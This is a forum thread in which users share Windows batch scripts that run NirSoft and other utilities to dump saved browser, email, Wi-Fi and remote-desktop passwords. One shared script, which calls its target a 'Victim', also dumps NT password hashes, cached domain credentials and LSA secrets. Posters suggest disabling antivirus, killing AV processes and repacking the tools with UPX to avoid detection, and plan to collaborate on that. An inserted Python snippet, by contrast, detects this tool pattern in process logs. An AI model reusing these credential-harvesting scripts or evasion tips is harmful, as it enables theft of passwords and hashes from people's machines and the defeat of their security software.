Hi, I read a post by user "Methical" a while back, where he created a batch file to automate the process of saving a user's passwords via the free Nirsoft password recovery tools. Well, I sort of tweaked the batch file, and here it is:

Code:
echo Backing Up FireFox Passwords...
start /wait "" "PasswordFox.exe" /shtml "ClientPasswords/FirefoxPasswords.html"
echo Backing Up Internet Explorer Passwords...
start /wait "" "iepv.exe" /shtml "ClientPasswords/iePasswords.html"
echo Backing Up Google Chrome Passwords...
start /wait "" "ChromePass.exe" /shtml "ClientPasswords/ChromePasswords.html"
echo Backing Up Opera Passwords...
start /wait "" "OperaPassView.exe" /shtml "ClientPasswords/OperaPasswords.html"
echo Backing Up Email Client Passwords...
start /wait "" "mailpv.exe" /shtml "ClientPasswords/EmailClientPasswords.html"
echo Backing Up Outlook PST Passwords...
start /wait "" "PstPassword.exe" /shtml "ClientPasswords/OutlookPSTPasswords.html"
echo Backing Up Dial-Up Passwords...
start /wait "" "dialupass.exe" /shtml "ClientPasswords/DialUpPasswords.html"
echo Backing Up Instant Messaging Client Passwords...
start /wait "" "mspass.exe" /shtml "ClientPasswords/InstantMessengerPasswords.html"
echo Backing Up Wireless Network Keys...
start /wait "" "WirelessKeyView.exe" /shtml "ClientPasswords/WiFiKeys.html"
echo Backing Up Software Product Keys...
start /wait "" "ProduKey.exe" /shtml "ClientPasswords/SoftwareProductKeys.html"
echo Backing Up Other Network Passwords...
start /wait "" "Netpass.exe" /shtml "ClientPasswords/Netpass.html"
echo Backing Up Protected Storage Passwords...
start /wait "" "pspv.exe" /shtml "ClientPasswords/ProtectedStorage.html"
echo.

Create a new directory (folder) and download/unzip the following Nirsoft EXE files into it:

ChromePass.exe
Dialupass.exe
iepv.exe
mailpv.exe
mspass.exe
netpass.cfg
netpass.exe
OperaPassView.exe
PasswordFox.exe
ProduKey.exe
pspv.exe
PstPassword.exe
WirelessKeyView.exe

(All available on the nirsoft.net website)

Next, create a directory (in your newly made directory) named "ClientPasswords" (without the quotes). Run the batch file, and all passwords will be backed up into .html files automatically. On subsequent executions of the batch file, the .html files will be overwritten, so make sure you save a copy of each client's passwords in a separate folder (renamed to match the client's name).

There are probably easier ways to do this, but I thought it might prove useful. I know of the tool "SIW" that does the same function, but you have to pay $79.00 or something for a technician's version. If you know of any other programs that can quickly and automatically save a client's various passwords (and are freeware), please post here and let me know. Thanks.
You forgot Step 1: Deactivate AntiVirus. I love NirSoft but I've been nailed so many times by the AVs that kill off his software that I've practically given up on it. I'd try to back up their info to their Docs but deactivating their AV every time is a hassle for a 'value added' convenience.
That script is part of my project. Look it up, you might find it useful.

@iisjman07 When the 'Automation and Scripting' section first arose, I was tryin' to create a script (with the help of the community) to close/exit/kill all AntiVirus processes. The reason I needed help from the community is because of all the AVs, and each one runs a few processes. No one seemed interested in helping, so I left it as it was... Ended up finding the 'KillAll' batch/vbs file, and got kdyer to edit it so that it generated a 'restore.bat' so you could restore killed processes if you so wish. This has its limitations: only apps/processes opened by the USER (not the SYSTEM) were killed (this did not include AVs). Dig it up if you want, should be on the last page in the 'Automation and Scripting' section.
the system process are usually services , the service names can be stopped with "net stop (avname)" I made a tool in assembly like 7 years ago that killed running avs , but relied on the process names and service names so its a bit outdated im sure this can be achieved either way , with my app or batch files if we can get together and get some app names on the other hand nirsoft tools can be upx unpacked and repacked with something else to make them less detected this is an old nirsoft script , with other password retrievers thrown in I used to use some of the .exes you can find on google if you want to add them Code: @title RAPING YOUR SYSTEM,PLEASE STAND BY..... @echo off REM CREATE A FOLDER OF THE COMPUTER NAME if NOT exist rape\results\%computername% mkdir rape\results\%computername% >nul REM #############################NIRSOFT PASSWORDS RETRIEVAL SECTION################################################## @Echo windows network passes (shares .NET passport) rape\netpass.exe /shtml rape\results\%computername%\NetPass.html @Echo Instant Messenger Passes rape\mspass.exe /shtml rape\results\%computername%\IMPass.html @Echo Mail PassView rape\mailpv.exe /shtml rape\results\%computername%\MailPass.html @Echo wireless network keys (WEP/WPA) rape\WirelessKeyView.exe /shtml rape\results\%computername%\WepPass.html @Echo Protected Storage Passes rape\pspv.exe /shtml rape\results\%computername%\PStorPass.html @Echo Windows Install Keys rape\ProduKey.exe /shtml rape\results\%computername%\WinKeys.html @Echo IE7 Passes rape\iepv.exe /shtml rape\results\%computername%\iepv.html @Echo FireFox Passes rape\passwordfox.exe /shtml rape\results\%computername%\firefox.html @Echo Google Chrome Passes rape\chromepass.exe /shtml rape\results\%computername%\googlechrome.html @Echo Remote Desktop Passes rape\rdpv.exe /shtml rape\results\%computername%\rdpv.html @Echo LSA Secrets rape\lsasecretsview.exe /shtml rape\results\%computername%\lsasecrets.html REM 
//////////////////////////WINDOWS PASSWORD RETRIEVAL SECTION/////////////////////////////////////// ver >>rape\results\%computername%\passes.txt && echo Victim: [%computername%] Logged on User: [%username%]>>rape\results\%computername%\passes.txt && ECHO Raped@: %date% %time% >>rape\results\%computername%\passes.txt @echo. >>rape\results\%computername%\hashes.txt @Echo WinPass Cache @echo ################################# >>rape\results\%computername%\passes.txt @Echo ######[Raped Domain Cache Pass]###### >>rape\results\%computername%\passes.txt @echo ################################# >>rape\results\%computername%\passes.txt rape\cachedump -v >>rape\results\%computername%\passes.txt>>rape\results\%computername%\passes.txt @echo. >>rape\results\%computername%\hashes.txt @Echo NTPass from Memory @echo ################################# >>rape\results\%computername%\passes.txt @Echo ###[Raped Logon Pass from Memory]#### >>rape\results\%computername%\passes.txt @echo ################################# >>rape\results\%computername%\passes.txt rape\passwordReminder.exe >>rape\results\%computername%\passes.txt @echo. >>rape\results\%computername%\hashes.txt @Echo Password Cache @echo ################################# >>rape\results\%computername%\passes.txt @Echo #####[Raped Password Cache]###### >>rape\results\%computername%\passes.txt @echo ################################# >>rape\results\%computername%\passes.txt rape\cpd1_3.exe >>rape\results\%computername%\passes.txt>>rape\results\%computername%\passes.txt @echo. >>rape\results\%computername%\hashes.txt REM //////////////////////////WINDOWS NT HASH RETRIEVAL SECTION/////////////////////////////////////// ver >>rape\results\%computername%\hashes.txt @echo Victim: [%computername%] Logged on User: [%username%]>>rape\results\%computername%\hashes.txt @ECHO Raped@: %date% %time% >>rape\results\%computername%\hashes.txt @echo. 
>>rape\results\%computername%\hashes.txt @Echo PWDump6 @echo ################################# >>rape\results\%computername%\hashes.txt @echo #######[Raped Hashes PWDump6]#### >>rape\results\%computername%\hashes.txt @echo ################################# >>rape\results\%computername%\hashes.txt pwdump.exe localhost >>rape\results\%computername%\hashes.txt @echo. >>rape\results\%computername%\hashes.txt @Echo PWDUMP4 @echo ################################# >>rape\results\%computername%\hashes.txt @echo #######[Raped Hashes PWDump4]#### >>rape\results\%computername%\hashes.txt @echo ################################# >>rape\results\%computername%\hashes.txt rape\PWDump4.exe /l >>rape\results\%computername%\hashes.txt @echo. >>rape\results\%computername%\hashes.txt @Echo GetHashes @echo ################################# >>rape\results\%computername%\hashes.txt @echo #####[Raped Hashes GetHashes]#### >>rape\results\%computername%\hashes.txt @echo ################################# >>rape\results\%computername%\hashes.txt rape\gethashes.exe $local >>rape\results\%computername%\hashes.txt @echo. >>rape\results\%computername%\hashes.txt @Echo Syskeyed Repair SAM @echo ################################# >>rape\results\%computername%\hashes.txt @echo #######[Raped Repair Hashes]##### >>rape\results\%computername%\hashes.txt @echo ################################# >>rape\results\%computername%\hashes.txt IF EXIST C:\winnt ( rape\getsyskey C:\WINNT\repair\system && rape\gethashes C:\WINNT\repair\sam StartKey.key >>rape\results\%computername%\hashes.txt && del StartKey.key @echo. >>rape\results\%computername%\hashes.txt ) ELSE ( rape\getsyskey C:\WINDOWS\repair\system && rape\gethashes C:\WINDOWS\repair\sam StartKey.key >>rape\results\%computername%\hashes.txt && del StartKey.key @echo. 
>>rape\results\%computername%\hashes.txt ) REM //////////////////////////WINDOWS LSA SECRETS RETRIEVAL SECTION/////////////////////////////////////// @Echo LSASECRETS IF EXIST C:\winnt ( @echo Victim: [%computername%] Logged on User: [%username%] Raped@: %date% %time% >>rape\results\%computername%\lsa.txt @echo. >>rape\results\%computername%\LSA.txt @echo ################################# >>rape\results\%computername%\LSA.txt @echo ########[Raped LSA Secrets]###### >>rape\results\%computername%\LSA.txt @echo ################################# >>rape\results\%computername%\LSA.txt rape\lsadump2 >>rape\results\%computername%\LSA.txt @echo. >>rape\results\%computername%\LSA.txt ) @Echo Network Info ver >>rape\results\%computername%\%computername%_Network.txt && echo Victim: [%computername%] Logged on User: [%username%]>>rape\results\%computername%\%computername%_Network.txt && ECHO Raped@: %date% %time% >>rape\results\%computername%\%computername%_Network.txt @echo. >>rape\results\%computername%\%computername%_Network.txt ipconfig /all >>rape\results\%computername%\%computername%_Network.txt
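
Seen from the monitoring side, both batch files in this thread leave the same trace: several NirSoft utilities started by one parent process, each with the /shtml save switch. The following is an added example, not code from any poster in this thread, that flags that pattern in process-creation records; the record layout, sample events, thresholds and function names are assumptions, and the save switches other than /shtml go beyond what the thread shows.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Tool names taken from the two batch files in this thread (lower-cased).
TOOLS = {"passwordfox.exe", "iepv.exe", "chromepass.exe", "operapassview.exe",
         "mailpv.exe", "pstpassword.exe", "dialupass.exe", "mspass.exe",
         "wirelesskeyview.exe", "produkey.exe", "netpass.exe", "pspv.exe",
         "rdpv.exe", "lsasecretsview.exe"}
# /shtml is what the thread uses; sibling save switches added as a generalization.
EXPORT = re.compile(
    r'(?<!\S)/s(?:html|verhtml|text|tab|comma|xml)\s+(?:"([^"]+)"|(\S+))', re.I)

# Constructed records (assumed layout): time, host, parent_pid, image, cmdline.
SAMPLE = [
    ("2024-05-01T10:00:01", "WS01", 4120, r"E:\kit\PasswordFox.exe", r'"PasswordFox.exe" /shtml "ClientPasswords/FirefoxPasswords.html"'),
    ("2024-05-01T10:00:03", "WS01", 4120, r"E:\kit\iepv.exe", r'"iepv.exe" /shtml "ClientPasswords/iePasswords.html"'),
    ("2024-05-01T10:00:05", "WS01", 4120, r"E:\kit\ChromePass.exe", r'"ChromePass.exe" /shtml "ClientPasswords/ChromePasswords.html"'),
    ("2024-05-01T11:30:00", "WS01", 988, r"C:\Tools\ProduKey.exe", r'"C:\Tools\ProduKey.exe"'),
    ("2024-05-01T12:00:00", "WS02", 77, r"C:\Tools\mailpv.exe", r'mailpv.exe /shtml out.html'),
]

def classify(image, cmdline):
    """Return (is_hit, tool_name, output_path) for one process-creation record."""
    name = PureWindowsPath(image).name.lower()
    m = EXPORT.search(cmdline)
    out = (m.group(1) or m.group(2)) if m else None
    # A known name alone is weak (interactive use); name plus silent save is the signal.
    return (name in TOOLS and m is not None), name, out

def find_bursts(events, window=timedelta(seconds=120), min_tools=3):
    """Alert when one parent on one host starts several distinct tools in a window."""
    hits = defaultdict(list)
    for t, host, ppid, image, cmdline in events:
        ok, name, out = classify(image, cmdline)
        if ok:
            hits[host, ppid].append((datetime.fromisoformat(t), name, out))
    alerts = []
    for (host, ppid), rows in hits.items():
        rows.sort()
        for i, (t0, _, _) in enumerate(rows):
            burst = [r for r in rows[i:] if r[0] - t0 <= window]
            tools = sorted({r[1] for r in burst})
            if len(tools) >= min_tools:
                alerts.append({"host": host, "parent_pid": ppid, "tools": tools,
                               "outputs": [r[2] for r in burst]})
                break
    return alerts
```

Name matching misses renamed binaries, so treat this as one signal alongside file-hash or signer checks on the executables.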
All this looks cool. But now which one of these should I use? Just want a nice thing where I can double click on an icon and the job is done.
I didn't think these password recovery tools managed to pull passwords from HTTPS sites (like your bank, for example). I know mine don't show up.

@AtYourService I'm keen on getting together and collaborating on this with you. I did start a thread somewhere, and had a few processes listed. BitDefender, AVG, Avira etc. (Can't remember exactly; I'm sure it had a few though.) I'll dig it up later and attach it to this thread.